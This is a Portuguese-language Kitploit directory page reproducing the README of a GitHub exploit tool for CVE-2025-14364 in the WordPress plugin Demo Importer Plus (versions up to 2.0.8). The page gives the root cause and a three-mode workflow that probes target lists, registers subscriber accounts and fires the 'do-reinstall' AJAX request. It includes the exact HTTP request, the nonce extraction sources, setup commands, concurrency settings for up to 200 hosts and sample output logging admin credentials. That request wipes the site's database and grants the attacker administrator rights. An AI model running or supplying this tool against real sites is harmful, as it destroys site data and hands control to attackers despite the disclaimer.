Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-14364 — Demo Importer Plus <= 2.0.8 - Falta de Autorização para Redefinição do Site Autenticada (Assinante+) e Escalação de Privilégios | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-14364
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-14364

CVE-2025-14364

Demo Importer Plus <= 2.0.8 - Falta de Autorização para Redefinição do Site Autenticada (Assinante+) e Escalação de Privilégios

Ver Repositório
1há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-14364

Demo Importer Plus <= 2.0.8 - Falta de Autorização para Usuário Autenticado (Assinante+) Redefinição do Site e Escalação de Privilégio

CVE-2025-14364 — Demo Importer Plus · Redefinição Completa do Site → Escalação de Privilégio

root@kitploit:~
  _      _   _   _  _   _            _   _
 / \  / |_ __ ) / \  ) |_ __ /| |_|_ _) |_ |_|_
 \_ \/  |_   /_ \_/ /_  _)    |   |  _) |_)  |

Assinante Autenticado → Administrador via ação AJAX do-reinstall


CVE CVSS Plugin Auth Python Platform Author


〔 1 〕 Vulnerabilidade

Causa Raiz:
Ajax::handle_request() registra a ação AJAX demo_importer_plus sem chamar current_user_can(). Qualquer assinante autenticado pode enviar {"demo_action":"do-reinstall"} para acionar wp_install(), que remove todas as tabelas do banco de dados (exceto users / usermeta) e reexecuta a configuração do WordPress — atribuindo automaticamente o papel de Administrador à conta atacante no processo.


〔 2 〕 Fluxo do Ataque

root@kitploit:~
Mode 1 — Diagnose
  Probe: DNS · /wp-login.php · /wp-admin/admin-ajax.php · REST /wp/v2/users
  → Identify live WordPress targets

Mode 2 — Register
  POST /wp-login.php?action=register
  → Create subscriber account
  → Activation email sent to inbox
     ↳ You MUST click the email link before running Mode 3

Mode 3 — Exploit
  POST /wp-login.php                         → Authenticate as subscriber
  GET  /wp-admin/                            → Extract wp-rest-nonce
  POST /wp-admin/admin-ajax.php
       action=demo_importer_plus
       {"demo_action":"do-reinstall"}        → Trigger full site reset
  ← Response: "Site has been reset successfully"
  → Attacking account now holds Administrator role

〔 3 〕 Configuração

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-14364.git
cd CVE-2025-14364
pip install -r requirements.txt
python3 CVE-2025-14364.py

requirements.txt

root@kitploit:~
aiohttp>=3.9.0
colorama>=0.4.6
urllib3>=1.26.0

〔 4 〕 Uso

root@kitploit:~
Mode [1/2/3]:           1 = Diagnose   2 = Register   3 = Exploit
Targets file:           list.txt  (one host per line)
Concurrency:            default 30, max 200
Timeout:                default 10s

Formato dos alvos — list.txt:

root@kitploit:~
https://target1.com
target2.com
http://target3.com

► Modo 1 · Diagnóstico

Sonda quatro endpoints por host e escreve resultados limpos.

root@kitploit:~
Mode: 1

Saída → diagnostics_results.txt · passed_targets.txt


► Modo 2 · Registrar

root@kitploit:~
Mode: 2
Email:    [email protected]
Username: Nxploited
Password: NxploitedSA

Verifique sua caixa de entrada e clique no link de ativação antes de executar o Modo 3.

Saída → register_results.txt


► Modo 3 · Explorar

root@kitploit:~
Mode: 3
Username: Nxploited
Password: NxploitedSA

Em caso de sucesso, a ferramenta imprime:

root@kitploit:~
[HH:MM:SS] SUCCESS  "success":true,"message":"Site has been reset successfully" -> https://target.com

E escreve em exploit_results.txt:

root@kitploit:~
https://target.com/wp-login.php  site:...  user:Nxploited  pass:NxploitedSA  type:admin

〔 5 〕 Arquivos de Saída


〔 6 〕 Detalhe Técnico

Requisição vulnerável:

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=demo_importer_plus HTTP/1.1
Content-Type: application/json
X-WP-Nonce: <extracted_nonce>

{"demo_action":"do-reinstall"}

Resposta bem-sucedida:

root@kitploit:~
{"success": true, "data": {"message": "Site has been reset successfully"}}

Extração do nonce — duas fontes alternativas:

root@kitploit:~
wpApiSettings.nonce              (from /wp-admin/ page source)
elementorOneSettingsData.wpRestNonce   (fallback)

〔 7 〕 Autor e Contato

root@kitploit:~
By   : Nxploited (Khaled Alenazi)
GitHub   : https://github.com/Nxploited
Telegram : @KNxploited

GitHub Telegram


〔 8 〕 Aviso Legal

root@kitploit:~
THIS SOFTWARE IS RELEASED STRICTLY FOR SECURITY RESEARCH AND EDUCATION.

The author bears zero responsibility for any actions taken with this tool
against systems the operator does not own or have explicit written
authorization to test.

Unauthorized use against third-party systems violates computer crime laws
in most jurisdictions (CFAA, CMA, and equivalents worldwide) and may result
in criminal prosecution.

You alone are responsible for ensuring you have lawful permission
before running this tool against any target.

© 2025 Nxploited · Apenas para Pesquisa de Segurança · Demo Importer Plus ≤ 2.0.8 · Corrigido na versão 2.0.9
Baixar ferramenta
CVECVE-2025-14364
CVSS v3.18.8 HIGH — CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
PluginDemo Importer Plus
AfetadoTodas as versões ≤ 2.0.8
Autenticação necessáriaAssinante (função mais baixa registrada)
TipoFalta de Verificação de Capacidade → Redefinição Completa do Site → Escalação de Privilégio
CWECWE-862 · Falta de Autorização
ArquivoConteúdo
diagnostics_results.txtJSON completo da sonda por alvo
passed_targets.txtAlvos limpos (nenhum erro detectado)
register_results.txtRegistros de tentativa de registro
exploit_results.txtLogin · nonce · resultados de reset · acertos admin confirmados
reset_results.txtResposta bruta de do-reinstall por alvo